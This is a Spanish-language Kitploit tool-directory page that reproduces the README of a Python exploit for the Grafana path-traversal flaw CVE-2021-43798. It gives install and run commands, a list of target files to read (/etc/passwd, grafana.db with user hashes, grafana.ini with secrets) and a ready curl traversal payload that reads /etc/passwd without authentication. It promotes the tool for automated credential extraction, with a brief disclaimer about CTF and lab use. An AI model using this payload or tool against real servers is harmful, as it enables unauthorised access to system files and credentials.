Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/kikechans/-grafana-lfi-cve-2021-43798
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónCTFPruebas de Penetración
GitHubkikechans/-grafana-lfi-cve-2021-43798

-Grafana-LFI-CVE-2021-43798

📂 Exploit LFI de Grafana (CVE-2021-43798). Extracción automatizada de credenciales y configuración. 🕵️

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚀 Grafana LFI Exploit (CVE-2021-43798)

Script de automatización en Python 3 para explotar la vulnerabilidad de Local File Inclusion (LFI) en Grafana (versiones de la 8.0.0 a la 8.3.0). Este exploit permite realizar un directory traversal para leer archivos sensibles del sistema operativo sin autenticación. ✨ Características

root@kitploit:~
Compatibilidad Python 3.10+: Parcheado para funcionar con versiones modernas de Python (corrección de collections.Mapping).

Escaneo por Lote: Capacidad para procesar múltiples objetivos mediante un archivo targets.txt.

Descifrado de Datos: Incluye módulos para el manejo de sesiones y datos cifrados de Grafana.

Optimizado para CTF: Salida limpia y directa, ideal para laboratorios como HackTheBox y TryHackMe.

🛠️ Requisitos e Instalación

Debido a las dependencias de librerías antiguas, se recomienda instalar los siguientes paquetes: Bash

pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages

root@kitploit:~
Nota: Si usas Python 3.10 o superior, el script incluye un parche automático para la compatibilidad con collections.abc.

🚀 Uso

root@kitploit:~
Configurar objetivos: Añade las URLs (con puerto) en el archivo targets.txt.
Bash

echo "http://10.129.234.47:3000" > targets.txt

Ejecutar el exploit:
Bash

python3 exploit.py

🎯 Objetivos comunes de lectura (LFI)

Una vez ejecutado, puedes intentar leer archivos críticos como:

root@kitploit:~
/etc/passwd (Usuarios del sistema)

/var/lib/grafana/grafana.db (Base de datos con hashes de usuarios)

/etc/grafana/grafana.ini (Configuración y secretos)

💡 Método Alternativo (Manual)

Si prefieres no usar el script, puedes explotar el LFI directamente vía curl: Bash

curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

⚠️ Disclaimer

Este repositorio ha sido creado con fines exclusivamente educativos y para su uso en entornos controlados (CTFs, laboratorios). El autor no se responsabiliza del mal uso de esta herramienta. 🏷️ Topics (Etiquetas)

grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal

Descargar herramienta